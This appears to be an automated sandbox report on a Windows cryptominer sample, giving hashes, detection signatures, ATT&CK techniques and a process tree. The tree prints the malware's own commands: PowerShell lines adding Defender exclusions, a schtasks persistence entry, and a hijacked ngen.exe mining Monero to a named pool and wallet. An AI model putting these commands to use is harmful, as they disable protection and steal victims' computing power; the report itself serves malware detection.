xmrig | 87902a3c730dd8229cb2a1b055ca95bd6ac7228ef5a921c4f9144a7df9f74f6a

Analysis

max time kernel
126s
max time network
138s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
06/07/2023, 01:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe
Size

1.9MB
MD5

afef5d166670497a64ef81f1f2061524
SHA1

b0a689dcc3be4c211f9db665958696b21c98d33c
SHA256

8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331
SHA512

b9f71097c615be9406362f7ed9a02a794430b45930d7a1626f7d488d40d69caf580db92e4bbdec5c01d5a7de9ab1f4f5a4d4848948c0b291277cd05f648af067
SSDEEP

24576:CCcQUvMemoohN2pruSwiPSCmDS+5uSldPNEQ/Lx:PtMMhYruSwiPSCmDS+5uSldPWQD

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral1/memory/2824-118-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-119-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-120-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-121-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-122-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-124-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-127-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-129-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-131-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-132-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/2824-134-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
696	RKGME.exe

Loads dropped DLL 1 IoCs

pid	Process
1416	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 696 set thread context of 2824	696	RKGME.exe	45

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1540	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2228	timeout.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2372	powershell.exe
2340	powershell.exe
996	powershell.exe
2040	powershell.exe
696	RKGME.exe
696	RKGME.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	696	RKGME.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 2372	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	29
PID 2072 wrote to memory of 2372	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	29
PID 2072 wrote to memory of 2372	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	29
PID 2072 wrote to memory of 2340	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	31
PID 2072 wrote to memory of 2340	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	31
PID 2072 wrote to memory of 2340	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	31
PID 2072 wrote to memory of 1416	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	33
PID 2072 wrote to memory of 1416	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	33
PID 2072 wrote to memory of 1416	2072	8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe	33
PID 1416 wrote to memory of 2228	1416	cmd.exe	35
PID 1416 wrote to memory of 2228	1416	cmd.exe	35
PID 1416 wrote to memory of 2228	1416	cmd.exe	35
PID 1416 wrote to memory of 696	1416	cmd.exe	36
PID 1416 wrote to memory of 696	1416	cmd.exe	36
PID 1416 wrote to memory of 696	1416	cmd.exe	36
PID 696 wrote to memory of 2040	696	RKGME.exe	37
PID 696 wrote to memory of 2040	696	RKGME.exe	37
PID 696 wrote to memory of 2040	696	RKGME.exe	37
PID 696 wrote to memory of 996	696	RKGME.exe	40
PID 696 wrote to memory of 996	696	RKGME.exe	40
PID 696 wrote to memory of 996	696	RKGME.exe	40
PID 696 wrote to memory of 1768	696	RKGME.exe	41
PID 696 wrote to memory of 1768	696	RKGME.exe	41
PID 696 wrote to memory of 1768	696	RKGME.exe	41
PID 1768 wrote to memory of 1540	1768	cmd.exe	43
PID 1768 wrote to memory of 1540	1768	cmd.exe	43
PID 1768 wrote to memory of 1540	1768	cmd.exe	43
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45
PID 696 wrote to memory of 2824	696	RKGME.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe
"C:\Users\Admin\AppData\Local\Temp\8cdc020d39d4378285c7327611ccf8c31fc2e6789d3e5784ea47012d13035331.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8BFB.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1416
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2228
- - C:\ProgramData\BackUp\RKGME.exe
    "C:\ProgramData\BackUp\RKGME.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:996
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1768
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "RKGME" /tr "C:\ProgramData\BackUp\RKGME.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1540
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -o xmr-eu1.nanopool.org:14433 -u 87N2CazJHoaY8ofHfhpKfj2SGmfMDHPXkgZNgeArkrabCc8vC81NNzxdN6Rjfemw5TGmZ2vbDrC6wDxqdGf7eqqYVBUpMZD --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      PID:2824

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\BackUp\RKGME.exe

Filesize
469.3MB

MD5
a41644b2ba18125ec15da600bb8d78f9

SHA1
0d24cd6b77fdcbbda1614c620667ac958de8a169

SHA256
2b3385ee9edd3113b7af479d2543bbde8d910d8abbf7652cc0c6be314ac1139d

SHA512
37d7f35f0aa54b32cffa0d27833882c6bfe699ff73e95bd6fd71a066cba973b764a8ca5f0c1dd2617cc9cef363666817fa6ce34856b4c1f0387922e5b1d80d4f

Download Submit
C:\ProgramData\BackUp\RKGME.exe

Filesize
571.2MB

MD5
061351d56d11edfe1091b854257b2680

SHA1
4a9e592deb99fb7a4e2dff4bdbeea45cf8194c28

SHA256
2d0517236f0dbcc9f389b1932be4eb367be273889b80a8c4a41a2ce7b7c6c5c7

SHA512
accb5fa68862692cacf1c818ffda3feb3fc5839c53f3956829899534de7641c551c34b8883cb3c6ab546636357f72519a2ecfd5430bf3a99315530d485e6c3a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8BFB.tmp.bat

Filesize
140B

MD5
d8ac7a019af4e16ea77d2c7b1c8d7be7

SHA1
cc2f6d97f2a98872a67d74fb17cb6f62a46a232a

SHA256
e3beac822f75a639aa28800e1658ac1a899fea0bd06ab02fbc9f2d68dadc50d8

SHA512
7800d9a7bff82e011d89e0e33fb09d23738c9c3344abbf8afe787aef574832eb46c7bf15ddf8f260c0dda372400f4486cdeac5b5f08427b0f41b6865bb7ef78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8BFB.tmp.bat

Filesize
140B

MD5
d8ac7a019af4e16ea77d2c7b1c8d7be7

SHA1
cc2f6d97f2a98872a67d74fb17cb6f62a46a232a

SHA256
e3beac822f75a639aa28800e1658ac1a899fea0bd06ab02fbc9f2d68dadc50d8

SHA512
7800d9a7bff82e011d89e0e33fb09d23738c9c3344abbf8afe787aef574832eb46c7bf15ddf8f260c0dda372400f4486cdeac5b5f08427b0f41b6865bb7ef78f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8c4e079e0b7df37fe0943a45d0e0629b

SHA1
1db832028a4a96ab425dbb4ada04b09da5131a11

SHA256
431b75c035e6960de3681256c1b2ce98423e4c029843b37d3d69bd0aeb834d01

SHA512
8798536d4aaa077438afed55df3ba1f4fbcc0a26d70eeb615af993cff3e340e3a327a8e71360eb3b95f7b3cdc63d8388581b4935a0b900d3106ec219046639f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8c4e079e0b7df37fe0943a45d0e0629b

SHA1
1db832028a4a96ab425dbb4ada04b09da5131a11

SHA256
431b75c035e6960de3681256c1b2ce98423e4c029843b37d3d69bd0aeb834d01

SHA512
8798536d4aaa077438afed55df3ba1f4fbcc0a26d70eeb615af993cff3e340e3a327a8e71360eb3b95f7b3cdc63d8388581b4935a0b900d3106ec219046639f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8c4e079e0b7df37fe0943a45d0e0629b

SHA1
1db832028a4a96ab425dbb4ada04b09da5131a11

SHA256
431b75c035e6960de3681256c1b2ce98423e4c029843b37d3d69bd0aeb834d01

SHA512
8798536d4aaa077438afed55df3ba1f4fbcc0a26d70eeb615af993cff3e340e3a327a8e71360eb3b95f7b3cdc63d8388581b4935a0b900d3106ec219046639f2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DQ6S5M29ULLOS6TCG3R1.temp

Filesize
7KB

MD5
8c4e079e0b7df37fe0943a45d0e0629b

SHA1
1db832028a4a96ab425dbb4ada04b09da5131a11

SHA256
431b75c035e6960de3681256c1b2ce98423e4c029843b37d3d69bd0aeb834d01

SHA512
8798536d4aaa077438afed55df3ba1f4fbcc0a26d70eeb615af993cff3e340e3a327a8e71360eb3b95f7b3cdc63d8388581b4935a0b900d3106ec219046639f2

Download Submit
\ProgramData\BackUp\RKGME.exe

Filesize
491.2MB

MD5
2f0dcf5637cef147ed80d164c3663293

SHA1
53a34c887681d0d4708b350f2c1847bdac950405

SHA256
ead1028ad7ff43e139eb641367f346a3ef406561a387aa24568fb1bb15136ed0

SHA512
649965ecd37aca93857d3b73f04bbd3a2a886852643ab852dccbd03fafa95080a8966e80f24eafa6bc8b9d03e4780b00bad2cb4919477998042c151e66b2b430

Download Submit
memory/696-91-0x00000000006E0000-0x00000000006E1000-memory.dmp

Filesize
4KB

Download
memory/696-111-0x000000001B4F0000-0x000000001B570000-memory.dmp

Filesize
512KB

Download
memory/696-89-0x0000000000960000-0x0000000000B48000-memory.dmp

Filesize
1.9MB

Download
memory/696-90-0x000000001B4F0000-0x000000001B570000-memory.dmp

Filesize
512KB

Download
memory/996-104-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/996-108-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/996-110-0x0000000002570000-0x00000000025F0000-memory.dmp

Filesize
512KB

Download
memory/2040-103-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/2040-107-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2040-109-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2072-74-0x000000001B2B0000-0x000000001B330000-memory.dmp

Filesize
512KB

Download
memory/2072-54-0x00000000011E0000-0x00000000013C8000-memory.dmp

Filesize
1.9MB

Download
memory/2072-56-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2072-55-0x000000001B2B0000-0x000000001B330000-memory.dmp

Filesize
512KB

Download
memory/2340-71-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2340-73-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2340-72-0x0000000002540000-0x00000000025C0000-memory.dmp

Filesize
512KB

Download
memory/2340-67-0x000000001B340000-0x000000001B622000-memory.dmp

Filesize
2.9MB

Download
memory/2372-70-0x000000000292B000-0x0000000002962000-memory.dmp

Filesize
220KB

Download
memory/2372-69-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/2372-68-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/2824-119-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-124-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-117-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-118-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-115-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-122-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-116-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-127-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-126-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

Filesize
4KB

Download
memory/2824-129-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-130-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2824-131-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-132-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2824-134-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download